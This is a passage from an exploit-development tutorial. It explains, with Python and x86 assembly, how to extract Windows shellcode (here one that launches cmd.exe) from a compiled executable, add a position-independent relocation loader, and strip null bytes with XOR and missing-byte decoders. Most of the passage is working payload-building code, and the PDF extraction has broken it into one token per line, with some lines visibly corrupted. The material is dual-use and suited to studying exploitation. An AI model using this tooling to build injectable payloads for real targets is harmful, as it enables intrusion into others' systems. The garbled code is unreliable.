 
      
for
 
s
 
in
 
addr_to_strings
.
values
():
 
            
print
(
'  '
 
+
 
s
[:
-
1
])
 
        
print
(
''
)
 
        
shellcode
 
=
 
add_loader_to_shellcode
(
shellcode
,
 
relocs
,
 
addr_to_strings
)
 
    
else
:
 
        
print
(
'No relocations found'
)
 
 
if
 
shellcode
.
find
(
'
\
0'
)
 
==
 
-
1
:
 
   
print
(
'Unbelievable: the shellcode does not need to be fixed!'
)
 
        
fixed_shellcode
 
=
 
shellcode
 
    
else
:
 
        
# shellcode contains null bytes and needs to be fixed.
 
        
print
(
'Fixing the shellcode...'
)
 
        
fixed_shellcode
 
=
 
get_fixed_s
hellcode_single_block
(
shellcode
)
 
        
if
 
fixed_shellcode
 
is
 
None
:
             
# if shellcode wasn't fixed...
 
            
fixed_shellcode
 
=
 
get_fixed_shellcode
(
shellcode
)
 
            
if
 
fixed_shellcode
 
is
 
None
:
 
                
print
(
'[!] Cannot fix the s
hellcode'
)
 
 
print
(
'final shellcode length: %d
\
n'
 
%
 
len
(
fixed_shellcode
))
 
    
print
(
'char shellcode[] = '
)
 
    
dump_shellcode
(
fixed_shellcode
)
 
 
main
()
 
 
Map file and shellcode length
 
We told the linker to produce a map file with the following options
:
 

 
Debugging
:
 
o
 
Generate Map File
: Yes (/MAP)
 
Tells the linker to generate a map file containing the structure of the EXE)
 
o
 
Map File Name
: mapfile
 
The map file is important to determine the shellcode length.
 
Here’s the relevant part of the map file:
 
shellcode
 
 
 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)
 
 
Preferred load address is 00400000
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 71 
-
 
 Start         Length     Name                   Class
 
 
0001:00000000 00000a9cH .text$mn                CODE
 
 0002:00000000 00000094H .idata$5                DATA
 
 000
2:00000094 00000004H .CRT$XCA                DATA
 
 0002:00000098 00000004H .CRT$XCAA               DATA
 
 0002:0000009c 00000004H .CRT$XCZ                DATA
 
 0002:000000a0 00000004H .CRT$XIA                DATA
 
 0002:000000a4 00000004H .CRT$XIAA          
     DATA
 
 0002:000000a8 00000004H .CRT$XIC                DATA
 
 0002:000000ac 00000004H .CRT$XIY                DATA
 
 0002:000000b0 00000004H .CRT$XIZ                DATA
 
 0002:000000c0 000000a8H .rdata                  DATA
 
 0002:00000168 00000084H .rdat
a$debug            DATA
 
 0002:000001f0 00000004H .rdata$sxdata           DATA
 
 0002:000001f4 00000004H .rtc$IAA                DATA
 
 0002:000001f8 00000004H .rtc$IZZ                DATA
 
 0002:000001fc 00000004H .rtc$TAA                DATA
 
 0002:00000200 0
0000004H .rtc$TZZ                DATA
 
 0002:00000208 0000005cH .xdata$x                DATA
 
 0002:00000264 00000000H .edata                  DATA
 
 0002:00000264 00000028H .idata$2                DATA
 
 0002:0000028c 00000014H .idata$3                DATA
 
 0
002:000002a0 00000094H .idata$4                DATA
 
 0002:00000334 0000027eH .idata$6                DATA
 
 0003:00000000 00000020H .data                   DATA
 
 0003:00000020 00000364H .bss                    DATA
 
 0004:00000000 00000058H .rsrc$01         
       DATA
 
 0004:00000060 00000180H .rsrc$02                DATA
 
 
Address         Publics by Value              Rva+Base       Lib:Object
 
 
 0000:00000000       ___guard_fids_table        00000000     <absolute>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 72 
-
 
 0000:00000000       ___guard_fids_count  
      00000000     <absolute>
 
 0000:00000000       ___guard_flags             00000000     <absolute>
 
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 
 0000:00000000       ___ImageBase               00400000     <linker
-
defined>
 
 000
1:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 
 0001:00000266       _main       
               00401266 f   shellcode.obj
 
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVC
RT:unhandld.obj
 
 0001:0000051f     
  ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 
 
0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
 
<snip>
 
The start of the map file tells us that section 1 is the .text section, which contains the code:
 
St
art         Length     Name                   Class
 
0001:00000000 00000a9cH .text$mn                CODE
 
The second part tells us that the 
.text
 section starts with 
?entryPoint@@YAHXZ
, our 
entryPoint
 function, 
and that main (here called 
_main
) is the last 
of our functions. Since 
main
 is at offset 0x266 and 
entryPoint
 is 
at 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.
 
Here’s how we do it in Python:
 
Python
 
 
def
 
get_shellcode_len
(
map_file
):
 
    
'''
 
    Gets the length 
of the shellcode by analyzing map_file (map produced by VS 2013)
 
    '''
 
    
try
:
 
        
with
 
open
(
map_file
,
 
'r'
)
 
as
 
f
:
 
            
lib_object
 
=
 
None
 
            
shellcode_len
 
=
 
None
 
            
for
 
line
 
in
 
f
:
 
                
parts
 
=
 
line
.
split
()
 
        
if
 
lib_object
 
is
 
not
 
None
:
 
                    
if
 
parts
[
-
1
]
 
==
 
lib_object
:
 
                        
raise
 
Exception
(
'_main is not the last function of %s'
 
%
 
lib_object
)
 
                    
else
:
 
                        
break
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 73 
-
 
                
elif
 
(
le
n
(
parts
)
 
>
 
2
 
and
 
parts
[
1
]
 
==
 
'_main'
):
 
                    
# Format:
 
                    
# 0001:00000274  _main   00401274 f   shellcode.obj
 
                    
shellcode_len
 
=
 
int
(
parts
[
0
].
split
(
':'
)[
1
],
 
16
)
 
                    
lib_object
 
=
 
parts
[
-
1
]
 
 
if
 
shellcode_len
 
is
 
None
:
 
                
raise
 
Exception
(
'Cannot determine shellcode length'
)
 
    
except
 
IOError
:
 
        
print
(
'[!] get_shellcode_len: Cannot open "%s"'
 
%
 
map_file
)
 
        
return
 
None
 
    
except
 
Exception
 
as
 
e
:
 
        
print
(
'[
!] get_shellcode_len: %s'
 
%
 
e
.
message
)
 
        
return
 
None
 
 
return
 
shellcode_len
 
 
extracting the shellcode
 
This part is very easy. We know the shellcode length and that the shellcode is located at the beginning of 
the 
.text
 section. Here’s the code:
 
P
ython
 
 
def
 
get_shellcode_and_relocs
(
exe_file
,
 
shellcode_len
):
 
    
'''
 
    Extracts the shellcode from the .text section of the file exe_file and the string
 
    relocations.
 
    Returns the triple (shellcode, relocs, addr_to_strings).
 
    '''
 
    
try
:
 
     
# Extracts the shellcode.
 
        
pe
 
=
 
pefile
.
PE
(
exe_file
)
 
        
shellcode
 
=
 
None
 
        
rdata
 
=
 
None
 
        
for
 
s
 
in
 
pe
.
sections
:
 
            
if
 
s
.
Name
 
==
 
'.text
\
0
\
0
\
0'
:
 
                
if
 
s
.
SizeOfRawData
 
<
 
shellcode_len
:
 
                    
raise
 
Exception
(
'.text section too small'
)
 
                
shellcode_start
 
=
 
s
.
VirtualAddress
 
                
shellcode_end
 
=
 
shellcode_start
 
+
 
shellcode_len
 
                
shellcode
 
=
 
pe
.
get_data
(
s
.
VirtualAddress
,
 
shellcode_len
)
 
            
elif
 
s
.
Name
 
==
 
'.rd
ata
\
0
\
0'
:
 
                
<
snip
>
 
 
if
 
shellcode
 
is
 
None
:
 
            
raise
 
Exception
(
'.text section not found'
)
 
        
if
 
rdata
 
is
 
None
:
 
            
raise
 
Exception
(
'.rdata section not found'
)
 
<
snip
>
 
 
I use the module 
pefile
 (
download
) which is quite intuitive to use. The relevant part is the body of the 
if
.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 74 
-
 
strings and .rdata
 
As we said before, our C/C++ code may contain strings. For instance, our shellcode contains the following 
line:
 
Python
 
 
My_C
reateProcessA
(
NULL
,
 
"cmd.exe"
,
 
NULL
,
 
NULL
,
 
TRUE
,
 
0
,
 
NULL
,
 
NULL
,
 
&
sInfo
,
 
&
procInfo
);
 
 
The string 
cmd.exe
 is located in the
 .rdata
 section, a read
-
only section containing initialized data. The code 
refers to that string using an absolute address:
 
00241152 50
                   push        eax  
 
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
 
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
 
00241162 50                   push        eax  
 
00241163 52                   pu
sh        edx  
 
00241164 52                   push        edx  
 
00241165 52                   push        edx  
 
00241166 6A 01                push        1  
 
00241168 52                   push        edx  
 
00241169 52                   push        edx  
 
00
24116A 68 18 21 24 00       push        242118h         <
------------------------
 
0024116F 52                   push        edx  
 
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
 
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+
0BCh],esi  
 
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
 
00241185 FF 54 24 34          call        dword ptr [esp+34h]
 
As we can see, the absolute address for
 cmd.exe
 is 242118h. Note that the address is part of a push 
instruction a
nd is located at 24116Bh. If we examine the file cmd.exe with a file editor, we see the following:
 
56A: 68 18 21 40 00           push        000402118h
 
where 56Ah is the offset in the file. The corresponding virtual address (i.e. in memory) is 40116A becau
se 
the image base is 400000h. This is the preferred address at which the executable should be loaded in 
memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at the 
preferred base address. However, if the executab
le is loaded at a different base address, the instruction 
needs to be fixed. How can the Windows loader know what locations of the executable contains addresses 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 75 
-
 
which need to be fixed? The PE file contains a 
Relocation Directory
, which in our case points t
o the 
.reloc
 
section. This contains all the RVAs of the locations that need to be fixed.
 
We can inspect this directory and look for addresses of locations that
 
1
.
 
are contained in the shellcode (i.e. go from .text:0 to the main function excluded),
 
2
.
 
contains po
inters to data in
 .rdata
.
 
For example, the Relocation Directory will contain, among many other addresses, the address 40116Bh 
which locates the last four bytes of the instruction 
push 402118h
. These bytes form the address 402118h 
which points to the string
 
cmd.exe
 contained in 
.rdata
 (which starts at address 402000h).
 
Let’s look at the function 
get_shellcode_and_relocs
. In the first part we extract the 
.rdata
 section:
 
Python
 
 
def
 
get_shellcode_and_relocs
(
exe_file
,
 
shellcode_len
):
 
    
'''
 
    Extracts the sh
ellcode from the .text section of the file exe_file and the string
 
    relocations.
 
    Returns the triple (shellcode, relocs, addr_to_strings).
 
    '''
 
    
try
:
 
        
# Extracts the shellcode.
 
        
pe
 
=
 
pefile
.
PE
(
exe_file
)
 
        
shellcode
 
=
 
None
 
  
rdata
 
=
 
None
 
        
for
 
s
 
in
 
pe
.
sections
:
 
            
if
 
s
.
Name
 
==
 
'.text
\
0
\
0
\
0'
:
 
                
<
snip
>
 
            
elif
 
s
.
Name
 
==
 
'.rdata
\
0
\
0'
:
 
                
rdata_start
 
=
 
s
.
VirtualAddress
 
                
rdata_end
 
=
 
rdata_start
 
+
 
s
.
Misc_Virtual
Size
 
                
rdata
 
=
 
pe
.
get_data
(
rdata_start
,
 
s
.
Misc_VirtualSize
)
 
 
if
 
shellcode
 
is
 
None
:
 
            
raise
 
Exception
(
'.text section not found'
)
 
        
if
 
rdata
 
is
 
None
:
 
            
raise
 
Exception
(
'.rdata section not found'
)
 
 
The relevant
 part is the body of the 
elif
.
 
In the second part of the same function, we analyze the relocations, find the locations within our shellcode 
and extract from 
.rdata
 the null
-
terminated strings referenced by those locations.
 
As we already said, we’re only in
terested in locations contained in our shellcode. Here’s the relevant part of 
the function 
get_shellcode_and_relocs
:
 
Python
 
 
# Extracts the relocations for the shellcode and the referenced strings in .rdata.
 
        
relocs
 
=
 
[]
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 76 
-
 
        
addr_to_stri
ngs
 
=
 
{}
 
        
for
 
rel_data
 
in
 
pe
.
DIRECTORY_ENTRY_BASERELOC
:
 
            
for
 
entry
 
in
 
rel_data
.
entries
[:
-
1
]:
         
# the last element's rvs is the base_rva (why?)
 
                
if
 
shellcode_start
 
<=
 
entry
.
rva
 
<
 
shellcode_end
:
 
                    
# Th
e relocation location is inside the shellcode.
 
                    
relocs
.
append
(
entry
.
rva
 
-
 
shellcode_start
)
      
# offset relative to the start of shellcode
 
                    
string_va
 
=
 
pe
.
get_dword_at_rva
(
entry
.
rva
)
 
                    
string_rva
 
=
 
s
tring_va
 
-
 
pe
.
OPTIONAL_HEADER
.
ImageBase
 
                    
if
 
string_rva
 
<
 
rdata_start
 
or
 
string_rva
 
>=
 
rdata_end
:
 
                        
raise
 
Exception
(
'shellcode references a section other than .rdata'
)
 
                    
str
 
=
 
get_cstring
(
rdata
,
 
str
ing_rva
 
-
 
rdata_start
)
 
                    
if
 
str
 
is
 
None
:
 
                        
raise
 
Exception
(
'Cannot extract string from .rdata'
)
 
                    
addr_to_strings
[
string_va
]
 
=
 
str
 
 
return
 
(
shellcode
,
 
relocs
,
 
addr_to_strings
)
 
 
pe.DIRECTORY
_ENTRY_BASERELOC
 is a list of data structures which contain a field named 
entries
 which 
is a list of relocations. First we check that the current relocation is within the shellcode. If it is, we do the 
following:
 
1
.
 
we append to 
relocs
 the offset of the reloc
ation relative to the start of the shellcode;
 
2
.
 
we extract from the shellcode the DWORD located at the offset just found and check that this 
DWORD points to data in
 .rdata
;
 
3
.
 
we extract from 
.rdata
 the null
-
terminated string whose starting location we found in
 (2);
 
4
.
 
we add the string to 
addr_to_strings
.
 
Note that:
 
i
.
 
relocs
 contains the offsets of the relocations within shellcode, i.e. the offsets of the DWORDs within 
shellcode that need to be fixed so that they point to the strings;
 
ii
.
 
addr_to_strings
 is a dictionary
 that associates the addresses found in (2) above to the actual strings.
 
adding the loader to the shellcode
 
The idea is to add the strings contained in 
addr_to_strings
 to the end 
of our shellcode and then to make the code in our shellcode reference 
those 
strings. Unfortunately, the 
code
→
strings
 linking must be done at 
runtime because we don’t know the starting address of the shellcode. 
To do this, we need to prepend a sort of “loader” which fixes the 
shellcode at runtime. Here’s the structure of our shellcode after the 
transformation:
 
 
o
ffX
 are DWORDs which point to the locations in the original shellcode 
that need to be fixed. The loader will fix these locations so that they 
point to the correct strings 
strX
.
 

exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 77 
-
 
To see exactly how things work, try to understand the following code:
 
Python
 
 
d
ef
 
add_loader_to_shellcode
(
shellcode
,
 
relocs
,
 
addr_to_strings
):
 
    
if
 
len
(
relocs
)
 
==
 
0
:
 
        
return
 
shellcode
                
# there are no relocations
 
 
# The format of the new shellcode is:
 
    
#       call    here
 
    
#   here:
 
    
#       ...
 
 
#   shellcode_start:
 
    
#       <shellcode>         (contains offsets to strX (offset are from "here" label))
 
    
#   relocs:
 
    
#       off1|off2|...       (offsets to relocations (offset are from "here" label))
 
    
#       str1|str2|...
 
 
delta
 
=
 
21
                                      
# shellcode_start 
-
 here
 
 
# Builds the first part (up to and not including the shellcode).
 
    
x
 
=
 
dword_to_bytes
(
delta
 
+
 
len
(
shellcode
))
 
    
y
 
=
 
dword_to_bytes
(
len
(
relocs
))
 
    
code
 
=
 
[
 
        
0xE8
,
 
0x00
,
 
0x
00
,
 
0x00
,
 
0x00
,
               
#   CALL here
 
                                                    
# here:
 
        
0x5E
,
                                       
#   POP ESI
 
        
0x8B
,
 
0xFE
,
                                 
#   MOV EDI, ESI
 
        
0x81
,
 
0xC6
,
 
x
[
0
],
 
x
[
1
],
 
x
[
2
],
 
x
[
3
],
         
#   ADD ESI, shellcode_start + len(shellcode) 
-
 here
 
        
0xB9
,
 
y
[
0
],
 
y
[
1
],
 
y
[
2
],
 
y
[
3
],
               
#   MOV ECX, len(relocs)
 
        
0xFC
,
                                       
#   CLD
 
                                 
# again:
 
        
0xAD
,
                                       
#   LODSD
 
        
0x01
,
 
0x3C
,
 
0x07
,
                           
#   ADD [EDI+EAX], EDI
 
        
0xE2
,
 
0xFA
                                  
#   LOOP again
 
                        
# shellcode_start:
 
    
]
 
 
# Builds the final part (offX and strX).
 
    
offset
 
=
 
delta
 
+
 
len
(
shellcode
)
 
+
 
len
(
relocs
)
 
*
 
4
           
# offset from "here" label
 
    
final_part
 
=
 
[
dword_to_string
(
r
 
+
 
delta
)
 
for
 
r
 
in
 
relocs
]
 
   
addr_to_offset
 
=
 
{}
 
    
for
 
addr
 
in
 
addr_to_strings
.
keys
():
 
        
str
 
=
 
addr_to_strings
[
addr
]
 
        
final_part
.
append
(
str
)
 
        
addr_to_offset
[
addr
]
 
=
 
offset
 
        
offset
 
+=
 
len
(
str
)
 
 
# Fixes the shellcode so that the pointers referenced by 
relocs point to the
 
    
# string in the final part.
 
    
byte_shellcode
 
=
 
[
ord
(
c
)
 
for
 
c
 
in
 
shellcode
]
 
    
for
 
off
 
in
 
relocs
:
 
        
addr
 
=
 
bytes_to_dword
(
byte_shellcode
[
off
:
off
+
4
])
 
        
byte_shellcode
[
off
:
off
+
4
]
 
=
 
dword_to_bytes
(
addr_to_offset
[
addr
])
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 78 
-
 
    
return
 
''
.
join
([
chr
(
b
)
 
for
 
b
 
in
 
(
code
 
+
 
byte_shellcode
)])
 
+
 
''
.
join
(
final_part
)
 
 
Let’s have a look at the loader:
 
Assembly (x86)
 
 
CALL
 
here
                   
; PUSH EIP+5; JMP here
 
  
here
:
 
    
POP
 
ESI
                     
; ESI = address of "here"
 
 
MOV
 
EDI
,
 
ESI
                
; EDI = address of "here"
 
    
ADD
 
ESI
,
 
shellcode_start
 
+
 
len
(
shellcode
)
 
-
 
here
        
; ESI = address of off1
 
    
MOV
 
ECX
,
 
len
(
relocs
)
        
; ECX = number of locations to fix
 
    
CLD
                         
; tells LODSD to
 go forwards
 
  
again
:
 
    
LODSD
                       
; EAX = offX; ESI += 4
 
    
ADD
 
[
EDI
+
EAX
],
 
EDI
          
; fixes location within shellcode
 
    
LOOP
 
again
                  
; DEC ECX; if ECX > 0 then JMP again
 
  
shellcode_start
:
 
    
<
shellcode
>
 
  
relocs
:
 
    
off1
|
off2
|
...
 
    
str1
|
str2
|
...
 
 
The first CALL is used to get the absolute address of 
here
 in memory. The loader uses this information to fix 
the offsets within the original shellcode. ESI points to 
off1
 so 
LODSD
 is used to read the offsets one by on
e. 
The instruction
 
ADD [EDI+EAX], EDI
 
fixes the locations within the shellcode. EAX is the current 
offX
 which is the offset of the location relative to 
here
. This means that EDI+EAX is the absolute address of that location. The DWORD at that location 
conta
ins the offset to the correct string relative to 
here
. By adding EDI to that DWORD, we turn the DWORD 
into the absolute address to the string. When the loader has finished, the shellcode, now fixed, is executed.
 
To conclude, it should be said that 
add_load
er_to_shellcode
 is called only if there are relocations. You can 
see that in the main function:
 
Python
 
 
<
snip
>
 
    
if
 
len
(
relocs
)
 
!=
 
0
:
 
        
print
(
'Found %d reference(s) to %d string(s) in .rdata'
 
%
 
(
len
(
relocs
),
 
len
(
addr_to_strings
)))
 
        
print
(
'St
rings:'
)
 
        
for
 
s
 
in
 
addr_to_strings
.
values
():
 
            
print
(
'  '
 
+
 
s
[:
-
1
])
 
        
print
(
''
)
 
        
shellcode
 
=
 
add_loader_to_shellcode
(
shellcode
,
 
relocs
,
 
addr_to_strings
)
 
    
else
:
 
        
print
(
'No relocations found'
)
 
<
snip
>
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 79 
-
 
 
Removing null
-
byt
es from the shellcode (I)
 
After relocations, if any, have been handled, it’s time to deal with the null bytes present in the shellcode. As 
we’ve already said, we need to remove them. To do that, I wrote two functions:
 
1
.
 
get_fixed_shellcode_single_block
 
2
.
 
get_f
ixed_shellcode
 
The first function doesn’t always work but produces shorter code so it should be tried first. The second 
function produces longer code but is guaranteed to work.
 
Let’s start with 
get_fixed_shellcode_single_block
. Here’s the function definiti
on:
 
Python
 
 
def
 
get_fixed_shellcode_single_block
(
shellcode
):
 
    
'''
 
    Returns a version of shellcode without null bytes or None if the
 
    shellcode can't be fixed.
 
    If this function fails, use get_fixed_shellcode().
 
    '''
 
 
# Finds one non
-
nul
l byte not present, if any.
 
    
bytes
 
=
 
set
([
ord
(
c
)
 
for
 
c
 
in
 
shellcode
])
 
    
missing_bytes
 
=
 
[
b
 
for
 
b
 
in
 
range
(
1
,
 
256
)
 
if
 
b
 
not
 
in
 
bytes
]
 
    
if
 
len
(
missing_bytes
)
 
==
 
0
:
 
        
return
 
None
                             
# shellcode can't be fixed
 
    
missing
_byte
 
=
 
missing_bytes
[
0
]
 
 
(
xor1
,
 
xor2
)
 
=
 
get_xor_values
(
len
(
shellcode
))
 
 
code
 
=
 
[
 
        
0xE8
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
                       
#   CALL $ + 4
 
                                                            
# here:
 
        
0xC0
,
        
                                       
#   (FF)C0 = INC EAX
 
        
0x5F
,
                                               
#   POP EDI
 
        
0xB9
,
 
xor1
[
0
],
 
xor1
[
1
],
 
xor1
[
2
],
 
xor1
[
3
],
           
#   MOV ECX, <xor value 1 for shellcode len>
 
        
0x81
,
 
0xF1
,
 
xor2
[
0
],
 
xor2
[
1
],
 
xor2
[
2
],
 
xor2
[
3
],
     
#   XOR ECX, <xor value 2 for shellcode len>
 
        
0x83
,
 
0xC7
,
 
29
,
                                     
#   ADD EDI, shellcode_begin 
-
 here
 
        
0x33
,
 
0xF6
,
                                         
#   XOR ESI, E
SI
 
        
0xFC
,
                                               
#   CLD
 
                                                            
# loop1:
 
        
0x8A
,
 
0x07
,
                                         
#   MOV AL, BYTE PTR [EDI]
 
        
0x3C
,
 
missing_byte
,
  
                               
#   CMP AL, <missing byte>
 
        
0x0F
,
 
0x44
,
 
0xC6
,
                                   
#   CMOVE EAX, ESI
 
        
0xAA
,
                                               
#   STOSB
 
        
0xE2
,
 
0xF6
                               
           
#   LOOP loop1
 
                                                            
# shellcode_begin:
 
    
]
 
 
return
 
''
.
join
([
chr
(
x
)
 
for
 
x
 
in
 
code
])
 
+
 
shellcode
.
replace
(
'
\
0'
,
 
chr
(
missing_byte
))
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 80 
-
 
 
The idea is very simple. We analyze the shellcode byte
 by byte and see if there is a missing value, i.e. a 
byte value which doesn’t appear anywhere in the shellcode. Let’s say this value is 0x14. We can now 
replace every 0x00 in the shellcode with 0x14. The shellcode doesn’t contain null bytes anymore but can
’t 
run because was modified. The last step is to add some sort of decoder to the shellcode that, at runtime, will 
restore the null bytes before the original shellcode is executed. You can see that code defined in the array 
code
:
 
Assembly (x86)
 
 
CALL
 
$
 
+
 
4
                                  
; PUSH "here"; JMP "here"
-
1
 
here
:
 
  
(
FF
)
C0
 
=
 
INC
 
EAX
                            
; not important: just a NOP
 
  
POP
 
EDI
                                     
; EDI = "here"
 
  
MOV
 
ECX
,
 
<
xor
 
value
 
1
 
for
 
shellcode
 
len
>
 
  
XOR
 
ECX
,
 
<
xor
 
value
 
2
 
for
 
shellcode
 
len
>
    
; ECX = shellcode length
 
  
ADD
 
EDI
,
 
shellcode_begin
 
-
 
here
             
; EDI = absolute address of original shellcode
 
  
XOR
 
ESI
,
 
ESI
                                
; ESI = 0
 
  
CLD
                                        
 
; tells STOSB to go forwards
 
loop1
:
 
  
MOV
 
AL
,
 
BYTE
 
PTR
 
[
EDI
]
                      
; AL = current byte of the shellcode
 
  
CMP
 
AL
,
 
<
missing
 
byte
>
                      
; is AL the special byte?
 
  
CMOVE
 
EAX
,
 
ESI
                              
; if AL is the spe
cial byte, then EAX = 0
 
  
STOSB
                                       
; overwrite the current byte of the shellcode with AL
 
  
LOOP
 
loop1
                                  
; DEC ECX; if ECX > 0 then JMP loop1
 
shellcode_begin
:
 
 
There are a couple of important
 details to discuss. First of all, this code can’t contain null bytes itself, 
because then we’d need another piece of code to remove them 
 
As you can see, the 
CALL
 instruction doesn’t jump to 
here
 because otherwise its opcode would’ve been
 
E8 00 00 00 00               #   CALL here
 
which contains four null bytes. Since the 
CALL
 instruction is 5 bytes, 
CALL here
 is equivalent to 
CALL $+5
.
 
The trick to get rid of the null bytes is to use 
CALL $+4
:
 
E8 FF FF FF FF               #   CALL $+4
 
That 
CALL
 skips 4 bytes and jmp to the last 
FF
 of the 
CALL
 itself. The 
CALL
 instruction is followed by the 
byte C0, so the instruction executed after the 
CALL
 is 
INC EAX
 which corresponds to 
FF C0
. Note that the 
value pushed by the 
CALL
 is still the absolute address of the 
here
 label.
 
There’s a second trick in the code to avoid null bytes:
 
Assembly (x86)
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 81 
-
 
 
MOV
 
ECX
,
 
<
xor
 
value
 
1
 
for
 
shellcode
 
len
>
 
XOR
 
ECX
,
 
<
x
or
 
value
 
2
 
for
 
shellcode
 
len
>
 
 
We could have just used
 
Assembly (x86)
 
 
MOV
 
ECX
,
 
<
shellcode
 
len
>
 
 
but that would’ve produced null bytes. In fact, for a shellcode of length 0x400, we would’ve had
 
B9 00 04 00 00        MOV ECX, 400h
 
which contains 3 null byte
s.
 
To avoid that, we choose a non
-
null byte which doesn’t appear in 00000400h. Let’s say we choose 0x01. 
Now we compute
 
<xor value 1 for shellcode len>
 = 00000400h xor 01010101 = 01010501h
 
<xor value 2 for shellcode len>
 = 01010101h
 
The net result is that 
<xor value 1 for shellcode len>
 and 
<xor value 2 for shellcode len>
 are both null
-
byte 
free and, when xored, produce the original value 400h.
 
Our two instructions become:
 
B9 01 05 01 01        MOV ECX, 01010501h
 
81 F1 01 01 01 01     XOR ECX, 01010101h
 
The
 two 
xor values
 are computed by the function 
get_xor_values
.
 
Having said that, the code is easy to understand: it just walks through the shellcode byte by byte and 
overwrites with null bytes the bytes which contain the special value (0x14, in our previous 
example).
 
Removing null
-
bytes from the shellcode (II)
 
The method above can fail because we could be unable to find a byte value which isn’t already present in 
the shellcode. If that happens, we need to use 
get_fixed_shellcode
, which is a little more comple
x.
 
The idea is to divide the shellcode into blocks of 254 bytes. Note that each block must have a “missing byte” 
because a byte can have 255 non
-
zero values. We could choose a missing byte for each block and handle 
each block individually. But that wouldn’
t be very space efficient, because for a shellcode of 254*N bytes we 
would need to store N “missing bytes” before or after the shellcode (the decoder needs to know the missing 
bytes). A more clever approach is to use the same “missing byte” for as many 254
-
byte blocks as possible. 
We start from the beginning of the shellcode and keep taking blocks until we run out of missing bytes. When 
this happens, we remove the last block from the previous chunk and begin with a new chunk starting from 
this last block. I
n the end, we will have a list of 
<missing_byte, num_blocks>
 pairs:
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 82 
-
 
[(missing_byte1, num_blocks1), (missing_byte2, num_blocks2), ...]
 
I decided to restrict 
num_blocksX
 to a single byte, so 
num_blocksX
 is between 1 and 255.
 
Here’s the part of 
get_fixed_shel
lcode
 which splits the shellcode into chunks:
 
Python
 
 
def
 
get_fixed_shellcode
(
shellcode
):
 
    
'''
 
    Returns a version of shellcode without null bytes. This version divides
 
    the shellcode into multiple blocks and should be used only if
 
    get_fixed_sh
ellcode_single_block() doesn't work with this shellcode.
 
    '''
 
 
# The format of bytes_blocks is
 
    
#   [missing_byte1, number_of_blocks1,
 
    
#    missing_byte2, number_of_blocks2, ...]
 
    
# where missing_byteX is the value used to overwrite the n
ull bytes in the
 
    
# shellcode, while number_of_blocksX is the number of 254
-
byte blocks where
 
    
# to use the corresponding missing_byteX.
 
    
bytes_blocks
 
=
 
[]
 
    
shellcode_len
 
=
 
len
(
shellcode
)
 
    
i
 
=
 
0
 
    
while
 
i
 
<
 
shellcode_len
:
 
        
num_block
s
 
=
 
0
 
        
missing_bytes
 
=
 
list
(
range
(
1
,
 
256
))
 
 
# Tries to find as many 254
-
byte contiguous blocks as possible which misses at
 
        
# least one non
-
null value. Note that a single 254
-
byte block always misses at
 
        
# least one non
-
null v
alue.
 
        
while
 
True
:
 
            
if
 
i
 
>=
 
shellcode_len
 
or
 
num_blocks
 
==
 
255
:
 
                
bytes_blocks
 
+=
 
[
missing_bytes
[
0
],
 
num_blocks
]
 
                
break
 
            
bytes
 
=
 
set
([
ord
(
c
)
 
for
 
c
 
in
 
shellcode
[
i
:
i
+
254
]])
 
            
new_missing_byt
es
 
=
 
[
b
 
for
 
b
 
in
 
missing_bytes
 
if
 
b
 
not
 
in
 
bytes
]
 
            
if
 
len
(
new_missing_bytes
)
 
!=
 
0
:
         
# new block added
 
                
missing_bytes
 
=
 
new_missing_bytes
 
                
num_blocks
 
+=
 
1
 
                
i
 
+=
 
254
 
            
else
:
 
           
bytes
 
+=
 
[
missing_bytes
[
0
],
 
num_blocks
]
 
                
break
 
<
snip
>
 
 
Like before, we need to discuss the “
decoder
” which is prepended to the shellcode. This decoder is a bit 
longer than the previous one but the principle is the same.
 
Here’s the code:
 
Python
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 83 
-
 
code
 
=
 
([
 
    
0xEB
,
 
len
(
bytes_blocks
)]
 
+
                          
#   JMP SHORT skip_bytes
 
                                                        
# bytes:
 
    
bytes_blocks
 
+
 
[
                                    
#   ...
 
                           
# skip_bytes:
 
    
0xE8
,
 
0xFF
,
 
0xFF
,
 
0xFF
,
